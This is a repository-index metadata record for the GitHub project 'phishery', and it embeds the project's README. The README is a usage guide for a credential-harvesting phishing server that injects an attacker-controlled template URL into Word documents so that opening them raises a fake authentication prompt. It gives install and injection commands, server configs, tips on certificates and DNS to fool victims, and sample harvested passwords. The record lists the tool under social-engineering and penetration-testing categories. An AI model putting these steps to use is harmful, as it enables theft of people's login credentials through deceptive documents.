{"id":13721455,"url":"https://github.com/ryhanson/phishery","last_synced_at":"2025-05-07T13:32:50.499Z","repository":{"id":41497710,"uuid":"69138985","full_name":"ryhanson/phishery","owner":"ryhanson","description":"An SSL Enabled Basic Auth Credential Harvester with a Word Document Template URL Injector","archived":false,"fork":false,"pushed_at":"2017-09-11T15:42:10.000Z","size":82,"stargazers_count":955,"open_issues_count":8,"forks_count":210,"subscribers_count":47,"default_branch":"master","last_synced_at":"2024-02-15T06:34:04.052Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ryhanson.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2016-09-25T02:19:24.000Z","updated_at":"2024-02-05T11:55:14.000Z","dependencies_parsed_at":"2022-08-29T11:21:48.516Z","dependency_job_id":null,"html_url":"https://github.com/ryhanson/phishery","commit_stats":null,"previous_names":["ryhanson/go-phish"],"tags_count":3,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ryhanson%2Fphishery","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ryhanson%2Fphishery/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ryhanson%2Fphishery/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ryhanson%2Fphishery/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ryhanson","download_url":"https://codeload.github.com/ryhanson/phishery/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://gi
thub.com","kind":"github","repositories_count":252886935,"owners_count":21819813,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-03T01:01:17.289Z","updated_at":"2025-05-07T13:32:50.129Z","avatar_url":"https://github.com/ryhanson.png","language":"Go","funding_links":[],"categories":["Social Engineering","Social Engineering Tools","Phishing","Tools"],"sub_categories":["Social Engineering Tools","Penetration Testing Report Templates"],"readme":"# phishery\n\nPhishery is a Simple SSL Enabled HTTP server with the primary purpose of phishing credentials via Basic Authentication. \nPhishery also provides the ability easily to inject the URL into a .docx Word document.\n\n![Basic Auth Dialog in Word](https://raw.githubusercontent.com/ryhanson/phishery/master/screenshots/PhisheryDialog.jpg \"Basic Auth Dialog in Word\")\n\nThe power of phishery is best demonstrated by setting a Word document's template to a phishery URL. This causes \nMicrosoft Word to make a request to the URL, resulting in an Authentication Dialog being shown to the end-user. 
The\nability to inject any .docx file with a URL is possible using phishery's \n`-i [in docx]`, `-o [out docx]`, and `-u [url]` options.\n\n### Download\nOperating system specific packages can be [downloaded from here](https://github.com/ryhanson/phishery/releases).\n\n### Install\nExtract the archive, and optionally, install binary to $PATH\n\n```bash\n$ tar -xzvf phishery*.tar.gz\n$ cd phishery*\n$ cp phishery /usr/local/bin\n```\n\n### Usage\n```text\n$ phishery --help\n\n|\\   \\\\\\\\__   O         __    _      __\n| \\_/    o \\  o  ____  / /_  (_)____/ /_  ___  _______  __\n\u003e _   (( \u003c_ oO  / __ \\/ __ \\/ / ___/ __ \\/ _ \\/ ___/ / / /\n| / \\__+___/   / /_/ / / / / (__  ) / / /  __/ /  / /_/ /\n|/     |/     / .___/_/ /_/_/____/_/ /_/\\___/_/   \\__, /\n             /_/ Basic Auth Credential Harvester (____/\n                 with Word Doc Template Injector\n\n  Start the server  : phishery -s settings.json -c credentials.json\n  Inject a template : phishery -u https://secure.site.local/docs -i good.docx -o bad.docx\n\n  Options:\n    -h, --help      Show usage and exit.\n    -v              Show version and exit.\n    -s              The JSON settings file used to setup the server. [default: \"settings.json\"]\n    -c              The JSON file to store harvested credentials. 
[default: \"credentials.json\"]\n    -u              The phishery URL to use as the Word document template.\n    -i              The Word .docx file to inject with a template URL.\n    -o              The new Word .docx file with the injected template URL.\n```\n\n##### Running the server\nModify the provided settings.json file as needed, by default it should look like this:\n\n```json\n{\n  \"ip\": \"0.0.0.0\",\n  \"port\": \"443\",\n  \"sslCert\": \"server.crt\",\n  \"sslKey\": \"server.key\",\n  \"basicRealm\": \"Secure Document Gateway\",\n  \"responseStatus\": 200,\n  \"responseFile\": \"template.dotx\",\n  \"responseHeaders\": [\n    [\"Content-Type\", \"application/vnd.openxmlformats-officedocument.wordprocessingml.template\"]\n  ]\n}\n```\n\nThis setup will start the HTTP server on Port *443* with SSL configured to use *server.crt* and *server.key*. \nThe basic authentication realm is set to *Secure Document Gateway*.\nWhen any credentials are provided, a *200* response status is sent along with the contents of the included *template.dotx* and\nthe content type header: *Content-Type: application/vnd.openxmlformats-officedocument.wordprocessingml.template*.\n\nThe settings file may also be configured to output a simple body, by using *responseBody*, like this:\n\n```json\n{\n  \"ip\": \"0.0.0.0\",\n  \"port\": \"443\",\n  \"sslCert\": \"server.crt\",\n  \"sslKey\": \"server.key\",\n  \"basicRealm\": \"Secure Document Gateway\",\n  \"responseStatus\": 404,\n  \"responseBody\": \"\u003ch1\u003eNot Found\u003c/h1\u003e\",\n  \"responseHeaders\": [\n    [\"Content-Type\", \"text/html\"]\n  ]\n}\n```\n\nThe effectiveness of this tool is based mostly on the Domain and Basic Auth Realm used, as that is often all the end user \nwill see when triggered from an Office document. 
Make sure to point your DNS A records to the public IP of the phishery server.\n\nIt's recommended that the provided cert is replaced with a trusted one, such as one generated with \n[LetsEncrypt](https://github.com/certbot/certbot). Microsoft Word on OS X will prevent the auth dialog if the cert is invalid, and Microsoft Word on Windows will prompt the user to accept the invalid certificate.\n\nOnce the server is configured and running, all you need to do is embed a phishery URL in a document, or anywhere\nelse your heart desires. phishery does give you the ability to inject your URL into a Word document as a template;\ninstructions on how to do this can be found below.\n\n##### Injecting a Word Document\nTo inject a Word document with a template URL, you'll need a .docx file and the phishery server URL.\n\nNow run phishery with your document and URL:\n\n```text\n$ phishery -u https://secure.site.local/docs -i good.docx -o bad.docx\n[+] Opening Word document: good.docx\n[+] Setting Word document template to: https://secure.site.local/docs\n[+] Saving injected Word document to: bad.docx\n[*] Injected Word document has been saved!\n```\n\nMake sure your phishery server is running and available at the URL you used. 
Now when the Word document\nis opened, the victim will be prompted with an authentication dialog.\n\nNow when the victim opens the document, you'll see the following:\n\n```text\n$ ./phishery\n[+] Credential store initialized at: credentials.json\n[+] Starting HTTPS Auth Server on: 0.0.0.0:443\n[*] Request Received at 2016-09-25 01:06:28: HEAD https://secure.site.local/docs\n[*] Sending Basic Auth response to: 127.0.0.1\n[*] New credentials harvested!\n[HTTP] Host        : secure.example.local\n[HTTP] Request     : /docs\n[HTTP] User Agent  : Microsoft Office Word\n[HTTP] IP Address  : 127.0.0.1\n[AUTH] Username    : john.doe\n[AUTH] Password    : Summer15\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fryhanson%2Fphishery","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fryhanson%2Fphishery","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fryhanson%2Fphishery/lists"}